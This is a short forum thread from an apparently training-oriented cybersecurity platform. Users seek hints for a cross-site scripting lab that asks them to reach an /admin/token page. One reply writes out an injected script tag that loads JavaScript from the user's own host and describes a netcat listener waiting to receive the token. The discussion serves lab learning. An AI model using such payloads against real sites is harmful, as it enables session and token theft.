Forum Discussion

Bronze I

3 months ago

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

natelott

Bronze I

2 months ago

Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.

Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.

Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

New Cyber Threat Intelligence Lab release!

Re: What are some good labs for learning the basics of malware analysis?

This Week in The Human Connection

New CTI Labs: Palo Alto Expedition Critical Vulnerabilities

Recent Discussions

Open Source Intelligence (OSINT): Boarding Pass

SuperSonic: Ep.6 – TEMPLE

Events & Breaches: Magecart Skimmer

CVE-2022-29799/CVE-2022-29800 (Nimbuspwn) – Defensive

Zeek - Demonstrate Your Skills